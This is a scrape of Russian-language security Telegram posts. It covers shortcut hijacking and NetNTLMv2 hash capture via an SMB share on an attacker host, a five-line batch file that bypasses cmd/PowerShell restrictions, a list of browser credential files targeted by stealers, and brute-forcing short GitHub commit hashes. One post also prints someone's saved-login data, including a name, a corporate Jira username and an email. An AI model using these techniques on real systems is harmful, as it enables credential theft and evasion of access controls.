WorkingDirectory : C:\Windows\System32
Теперь вместо браузера будет запускаться указанный бинарь (в данном случае калькулятор).
Стоит также отметить, что файл будет не заменен, а изменен, то-есть дата созданий осталась прежней. Также не изменились и иконка ярлыка (логотип браузера Edge).
Еще в далеком 2017 году 🔗показали малварь, который через ярлык запускал cmd с параметром /c и полезной нагрузкой. То-есть вирусом являлся сам ярлык, а не cmd.exe.
Еще есть древняя, но рабочая техника перехвата NetNTLMv2 хеша. Для этого в ссылке ярлыка указываем
\\<hacker_ip>\share\, запускаем на нашем <hacker_ip> smb сервер (Например, impacket-smbserver share . -smb2support ) и ждем аутентификацию.Ну и, конечно, куда без официально документации. Вот она — 🔗Тык
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍2
Привет, друзья! 😻
Сегодня я подготовил для вас интересную статью, посвященную анализу защищенности GraphQL. Мы рассмотрим, с чего вообще начинать анализ защищенности приложений на базе GraphQL и как встроенный функционал GraphQL может помочь обойти ограничения при brute force атаках💥
Всем приятного чтения, прекрасного вечера пятницы и продуктивных выходных!🤗
Ссылка на статью: https://shankdy.notion.site/GraphQL-bf1e8b80222f42b8986a50d65fd49524
#redteam
Сегодня я подготовил для вас интересную статью, посвященную анализу защищенности GraphQL. Мы рассмотрим, с чего вообще начинать анализ защищенности приложений на базе GraphQL и как встроенный функционал GraphQL может помочь обойти ограничения при brute force атаках
Всем приятного чтения, прекрасного вечера пятницы и продуктивных выходных!
Ссылка на статью: https://shankdy.notion.site/GraphQL-bf1e8b80222f42b8986a50d65fd49524
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
shankdy on Notion
Под капотом GraphQL: В поисках слабых мест | Notion
Автор: @closed_character
🔥8👍2❤1
Какие цели преследуют киберпреступники🧑💻?
Конечная цель, как правило, это 💰, и в зависимости от того сколько у злоумышленника времени и навыков будет зависеть на сколько большой куш он может сорвать.
Одним из первых шагов к достижению своей заветной цели является получение первоначального доступа. Он достигается путем использования таких методов как загрузка вредоносного программного обеспечения (ВПО) и фишинг.
И сегодня я хочу затронуть тему ВПО, какие они бывают, а так же по каким признакам можно быстро понять, что вы не просто рядовой пользователь, а еще и сотрудник организации.
Троян🐎
Основная специфика трояна - это обманывать жертв, за счёт применения оболочки легитимного ПО, и при запуске, он выполняет то, что нужно злоумышленникам.
Червь 🪱
Основная специфика червя - это его саморепликация, за счёт которой он становится способным дублировать себя как в пределах одной системы, создавая многочисленные копии в каталогах, так и перемещаясь по системам, создавая в каждой отдельной свою копию.
Шифровальщик 🔐
Основная специфика шифровальщика - это шифрование файлов на системе жертвы, таким образом, чтобы жертва не могла восстановить всё ранее зашифрованное. Как правило шифровальщики выгружают файлы с вашего устройства, чтобы использовать их в качестве шантажа.
Бэкдор (средство удаленного администрирования). 🚪
Бэкдор, или RAT (remote administration tool), — это приложение, которое позволяет честному системному администратору или злобному злоумышленнику управлять вашим компьютером на расстоянии.
Стиллер 🥷
Основная специфика стиллера - это автоматическая кража информации с системы жертвы.
Установщик📥
Основная специфика установщика - это автоматическое скачивание и запуск программ.
А одним из самых простых способов, понять, что перед атакующими сотрудник – это просмотр учетных данных браузера.
Вот список наиболее «просматриваемых» атакующими файлов:
• C:\Users\$user\AppData\Local\Google\Chrome\UserData\Default\LoginData
• C:\Users\$user\AppData\Local\Mozilla\Firefox\Profiles\*.default\key4.db
• C:\Users\$user\AppData\Local\Google\Chrome\UserData\LocalState
• C:\Users\$user\AppData\Local\Mozilla\Firefox\Profiles\*.default\key3.db
• C:\Users\$user\AppData\Local\Google\Chrome\UserData\Default\WebData
• C:\Users\$user\AppData\Local\Mozilla\Firefox\Profiles\*.default\logins.json
Ниже привел данные которые я нашел у себя:
Учетные данные, хранящиеся в браузерах, могут быть интересны как сами по себе, так и в связи с дальнейшим развитием атаки. Сами по себе данные обычно собираются стиллерами и затем продаются или выкладываются в открытый доступ. Также секреты пользователей могут содержать данные для аутентификации на внутренних ресурсах организации или раскрывать информацию о их местонахождении. Так же можно поискать пароли, которые были слиты, история браузера, логины у нас есть.
Ради интереса, посмотрите, какие данные получится достать у вас)
P.S. папка AppData скрыта, как просматривать скрытые файлы, можно узнать тут, а данные можно посмотреть, открыв их в текстовом редакторе
Ну а в следующем посте подготовлю подробную инструкцию по созданию лаборатории для анализа файлов и проанализируем с вами какой-нибудь интересный файлик🦠.
#blueteam
Конечная цель, как правило, это 💰, и в зависимости от того сколько у злоумышленника времени и навыков будет зависеть на сколько большой куш он может сорвать.
Одним из первых шагов к достижению своей заветной цели является получение первоначального доступа. Он достигается путем использования таких методов как загрузка вредоносного программного обеспечения (ВПО) и фишинг.
И сегодня я хочу затронуть тему ВПО, какие они бывают, а так же по каким признакам можно быстро понять, что вы не просто рядовой пользователь, а еще и сотрудник организации.
Троян🐎
Основная специфика трояна - это обманывать жертв, за счёт применения оболочки легитимного ПО, и при запуске, он выполняет то, что нужно злоумышленникам.
Червь 🪱
Основная специфика червя - это его саморепликация, за счёт которой он становится способным дублировать себя как в пределах одной системы, создавая многочисленные копии в каталогах, так и перемещаясь по системам, создавая в каждой отдельной свою копию.
Шифровальщик 🔐
Основная специфика шифровальщика - это шифрование файлов на системе жертвы, таким образом, чтобы жертва не могла восстановить всё ранее зашифрованное. Как правило шифровальщики выгружают файлы с вашего устройства, чтобы использовать их в качестве шантажа.
Бэкдор (средство удаленного администрирования). 🚪
Бэкдор, или RAT (remote administration tool), — это приложение, которое позволяет честному системному администратору или злобному злоумышленнику управлять вашим компьютером на расстоянии.
Стиллер 🥷
Основная специфика стиллера - это автоматическая кража информации с системы жертвы.
Установщик📥
Основная специфика установщика - это автоматическое скачивание и запуск программ.
А одним из самых простых способов, понять, что перед атакующими сотрудник – это просмотр учетных данных браузера.
Вот список наиболее «просматриваемых» атакующими файлов:
• C:\Users\$user\AppData\Local\Google\Chrome\UserData\Default\LoginData
• C:\Users\$user\AppData\Local\Mozilla\Firefox\Profiles\*.default\key4.db
• C:\Users\$user\AppData\Local\Google\Chrome\UserData\LocalState
• C:\Users\$user\AppData\Local\Mozilla\Firefox\Profiles\*.default\key3.db
• C:\Users\$user\AppData\Local\Google\Chrome\UserData\Default\WebData
• C:\Users\$user\AppData\Local\Mozilla\Firefox\Profiles\*.default\logins.json
Ниже привел данные которые я нашел у себя:
6f6fef3b-6c10-4605-8e91-2be26833ef61{"billing_address_id":"","card_holder":"GERMAN KOMAROV","card_title":"","expire_date_month":"12","expire_date_year":"2023","masked_card_number":"480023******0001","origin":"","use_count":18,"use_date":1715928491.637655,"yandex_card_type":0}OnLoginSuccessful@password_manager.cc:1285Detected successful login.{"context_data":null,"data":{"action":"https://jira.organization.ru/login.jsp","all_alternative_usernames":"komarov_g+5+os_username","last_url":"https://jira.organization.ru/login.jsp","password_element":"os_password","signon_realm":"https://jira.organization.ru/","submission_event":1,"url":"https://jira. organization.ru/login.jsp","username_element":"os_username","username_value":"komarov_g"}}"url":"https://skyarc.ru/signup","username_element":"email","username_value":komarov_g@mail.ru'
Учетные данные, хранящиеся в браузерах, могут быть интересны как сами по себе, так и в связи с дальнейшим развитием атаки. Сами по себе данные обычно собираются стиллерами и затем продаются или выкладываются в открытый доступ. Также секреты пользователей могут содержать данные для аутентификации на внутренних ресурсах организации или раскрывать информацию о их местонахождении. Так же можно поискать пароли, которые были слиты, история браузера, логины у нас есть.
Ради интереса, посмотрите, какие данные получится достать у вас)
P.S. папка AppData скрыта, как просматривать скрытые файлы, можно узнать тут, а данные можно посмотреть, открыв их в текстовом редакторе
Ну а в следующем посте подготовлю подробную инструкцию по созданию лаборатории для анализа файлов и проанализируем с вами какой-нибудь интересный файлик🦠.
#blueteam
Hi-Tech Mail
Как показать скрытые папки: подробный гайд для Windows и macOS
Возможность скрывать и снова отображать определенные папки позволяет сберечь какую-либо личную информацию от посторонних и просто убрать с глаз файлы, которые вам мешают.
🔥9👍7❤2
Доброго вечерочка 🥰
Помню как в старой голосовалке о контенте побеждал вариант: "Истории из реальной практики", поэтому немного поностальгирую с вашего позволения :)
Сегодня опять вспомним относительно специфический тру кейс из жизни, с которым кто-то может столкнуться в своей красной карьере, ну и синеньким на заметку конечно)
😋 Тру стори
Итак, стандартная ситуация у красненьких, получаем RDP-доступ к Windows-машинке (типовой АРМ пользователя), хотим пустить какой-нить PowerSploit из PS, жмаем на cmd/PS и видим:
Ну контактить администратору мы точно не будем, поэтому покажу простой способ открыть cmd :)
Для этого нам нужно создать текстовый файлик с расширением .bat и вписать туда:
Да, обычный батник в 5 строк помог решить проблему, но давайте разберемся подробнее, что там происходит (мы ж не просто так тут собрались, рандомные сплоиты просто так не жмаем и надеемся, что сработает, честно честно)
😋 Принцип работы
➡️ При запуске батника появляется окно с выводом текущего пути (переменная %cd%) вместе с символом ">", чтобы имитировать стандартную командную строку Windows.
➡️ Затем скрипт ждет, пока пользователь введет текст, и после нажатия Enter сохраняет его в переменную x.
➡️ Далее введенный пользователем текст исполняется как команда внутри скрипта (строка %х%).
➡️ Метка А используется для перезапуска процесса в цикле, чтобы пользователь мог выполнить несколько команд в одной открытой сессии батника.
😳 Итого
Данный батник будет лишь имитировать командную строку в цикле выполняя команды, которые вы ему дадите, но из него можно исполнить любую команду, вызывать оболочку PowerShell и пенетрировать дальше :)
А что еще нужно?😎
#redteam #REDtalk
Помню как в старой голосовалке о контенте побеждал вариант: "Истории из реальной практики", поэтому немного поностальгирую с вашего позволения :)
Сегодня опять вспомним относительно специфический тру кейс из жизни, с которым кто-то может столкнуться в своей красной карьере, ну и синеньким на заметку конечно)
Итак, стандартная ситуация у красненьких, получаем RDP-доступ к Windows-машинке (типовой АРМ пользователя), хотим пустить какой-нить PowerSploit из PS, жмаем на cmd/PS и видим:
This operation has been cancelled due to restrictions in effect on this computer. Please contact your system
administrator.
Ну контактить администратору мы точно не будем, поэтому покажу простой способ открыть cmd :)
Для этого нам нужно создать текстовый файлик с расширением .bat и вписать туда:
@echo off
:A
set /P x="%cd%>"
%x%
goto A
Да, обычный батник в 5 строк помог решить проблему, но давайте разберемся подробнее, что там происходит (мы ж не просто так тут собрались, рандомные сплоиты просто так не жмаем и надеемся, что сработает, честно честно)
Данный батник будет лишь имитировать командную строку в цикле выполняя команды, которые вы ему дадите, но из него можно исполнить любую команду, вызывать оболочку PowerShell и пенетрировать дальше :)
А что еще нужно?
#redteam #REDtalk
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19✍2❤🔥2👾2👍1
💥 Привет! Хотел поговорить про разнообразие полигонов для красных команд, а получилось затронуть один, самый популярный, но зато развёрнуто — это платформа HackTheBox.
Про него знают все. Многие указывают в резюме свои HTB профили или просто упоминают, что да, знаем, играли в коробки . Что же там такого интересного? Для начала то, что сами коробки разрабатываются не администрацией проекта, а игроками. Точнее, заинтересованными лицами. Более того, за их создание платят вознаграждение, размер которых зависит от конечного рейтинга и сложности, то есть за сложность Insane и отзывами 4.9/5 дадут больше 💰, чем за легкую.
Главным минусом такого принципа является невысокий общий скилл разработчиков тачек, если сложить всех вместе. Но, с другой стороны, каждая коробка показывает разные взгляды на решение встроенных в неё уязвимостей, даже если они будут повторятся из раза в раз 👾. А последнее время раз в несколько месяцев организаторы анонсируют “HTB Seasons”, где на протяжении ивента раз в неделю выходят тачки, которые нужно успевать решать до выхода следующей, а следовательно, такая нереальная скорость выхода даёт больше по-настоящему интересных и сложных коробок.
Помимо коробок на платформе есть не менее распиаренный сервис под названием “Pro Labs”. Как написано в их лозунгах, это "Elite Red Team Lab" и "REAL Enterprise Infrastructure” 🤯. Мы, которые одно время решали целый сезон без пропуска, и уставшие от нестабильной работы полигона Standoff, решили поиграть в Про Лабу Dante. По началу всё было прекрасно, 14 машин в одной лабе, с виндовсами и линуксами, запивотились, закрепились, поставили маячки и готовы действовать как настоящие редтимеры, НО, на следующее утро всё сбросилось. Сначала я подумал, что кто-то сильно попросил админов ребутнуть лабу из-за какой-нибудь неработающей критической уязвимости, которая влияет на всю лабу. Но нет, на деле оказалось, что вся инфраструктура лабы каждые 24 часа просто берет и уходит в ребут. Полностью. И поддержка это аргументировала “проверкой на работу уязвимостей”. А закрепляйтесь при помощи найденных паролей через SSH. Ну это ни в какие ворота. Вся концепция просто порублена на корню и непонятно, для кого это сделано. Мы даже специально дорешили её, чтобы оставить гневный отзыв (скриншот из превью поста)
Вот такой у меня опыт с HTB, последним я сильно огорчён 😢. У них есть еще несколько интересных сервисов, но они уже сильно идут в CTF-Like. Для синих, кстати, тоже относительно недавно добавили таски.
#redteam
Про него знают все. Многие указывают в резюме свои HTB профили или просто упоминают, что да, знаем, играли в коробки . Что же там такого интересного? Для начала то, что сами коробки разрабатываются не администрацией проекта, а игроками. Точнее, заинтересованными лицами. Более того, за их создание платят вознаграждение, размер которых зависит от конечного рейтинга и сложности, то есть за сложность Insane и отзывами 4.9/5 дадут больше 💰, чем за легкую.
Главным минусом такого принципа является невысокий общий скилл разработчиков тачек, если сложить всех вместе. Но, с другой стороны, каждая коробка показывает разные взгляды на решение встроенных в неё уязвимостей, даже если они будут повторятся из раза в раз 👾. А последнее время раз в несколько месяцев организаторы анонсируют “HTB Seasons”, где на протяжении ивента раз в неделю выходят тачки, которые нужно успевать решать до выхода следующей, а следовательно, такая нереальная скорость выхода даёт больше по-настоящему интересных и сложных коробок.
Помимо коробок на платформе есть не менее распиаренный сервис под названием “Pro Labs”. Как написано в их лозунгах, это "Elite Red Team Lab" и "REAL Enterprise Infrastructure” 🤯. Мы, которые одно время решали целый сезон без пропуска, и уставшие от нестабильной работы полигона Standoff, решили поиграть в Про Лабу Dante. По началу всё было прекрасно, 14 машин в одной лабе, с виндовсами и линуксами, запивотились, закрепились, поставили маячки и готовы действовать как настоящие редтимеры, НО, на следующее утро всё сбросилось. Сначала я подумал, что кто-то сильно попросил админов ребутнуть лабу из-за какой-нибудь неработающей критической уязвимости, которая влияет на всю лабу. Но нет, на деле оказалось, что вся инфраструктура лабы каждые 24 часа просто берет и уходит в ребут. Полностью. И поддержка это аргументировала “проверкой на работу уязвимостей”. А закрепляйтесь при помощи найденных паролей через SSH. Ну это ни в какие ворота. Вся концепция просто порублена на корню и непонятно, для кого это сделано. Мы даже специально дорешили её, чтобы оставить гневный отзыв (скриншот из превью поста)
Вот такой у меня опыт с HTB, последним я сильно огорчён 😢. У них есть еще несколько интересных сервисов, но они уже сильно идут в CTF-Like. Для синих, кстати, тоже относительно недавно добавили таски.
#redteam
👍10✍3👎1😢1🤝1
Привет, друзья! 👋
А вы знали, что любой может получить доступ к удаленным или приватным репозиториям на GitHub?😲 Правда в случае с приватными репозиториями, должен быть публичный форк проекта. И что самое интересное - это не баг, а вполне себе легитимный и даже задокументированный функционал 😻 . Ссылочка на документацию Git
Чтобы убедиться, что после удаления проекта коммиты все еще существуют, можете выполнить следующее:
1️⃣ Создаете форк любого публичного проекта.
2️⃣ Вносите изменения в новый форк, запоминаете хеш коммита и удаляете проект.
3️⃣ Вставляете хеш коммита с изменениями вашего удаленного форка в основной проект и радуетесь, что коммит никуда не исчез.
Если всё сделали верно, то при переходе по ссылке увидите надпись:
🔍 И если у проекта есть приватный форк, который используется для хранения каких-то фич, которые не должны быть в паблике, то это тоже можно прочитать.
Однако, как вы могли заметить, для обоих случаев нам необходимо знать хеш коммита. А где его взять? Например, перебрать. Серьезно!? 40 символов!? Спросите вы. И да, скажу я вам, можно попробовать перебрать. И не 40 символов, а 4. В GitHub есть система коротких ссылок. Таким образом, хеш вида:
превращается в
Что значительно упрощает задачу.
А пока мы пошли проверять подобный функционал на других площадках. 🚀 Можете ознакомиться со статьей команды TruffleSecurity. Ребята разобрали различные векторы использования данного функционала и рассказали, чем это может быть черевато.
🔗 Ссылочка на статью: https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github
#redteam
А вы знали, что любой может получить доступ к удаленным или приватным репозиториям на GitHub?
Чтобы убедиться, что после удаления проекта коммиты все еще существуют, можете выполнить следующее:
1️⃣ Создаете форк любого публичного проекта.
2️⃣ Вносите изменения в новый форк, запоминаете хеш коммита и удаляете проект.
3️⃣ Вставляете хеш коммита с изменениями вашего удаленного форка в основной проект и радуетесь, что коммит никуда не исчез.
Если всё сделали верно, то при переходе по ссылке увидите надпись:
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Однако, как вы могли заметить, для обоих случаев нам необходимо знать хеш коммита. А где его взять? Например, перебрать. Серьезно!? 40 символов!? Спросите вы. И да, скажу я вам, можно попробовать перебрать. И не 40 символов, а 4. В GitHub есть система коротких ссылок. Таким образом, хеш вида:
a7630fd249a81add7f252cb53173be04f61ce634
превращается в
a763
Что значительно упрощает задачу.
А пока мы пошли проверять подобный функционал на других площадках. 🚀 Можете ознакомиться со статьей команды TruffleSecurity. Ребята разобрали различные векторы использования данного функционала и рассказали, чем это может быть черевато.
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub Docs
What happens to forks when a repository is deleted or changes visibility? - GitHub Docs
Deleting your repository or changing its visibility affects that repository's forks.
🔥10✍1🎃1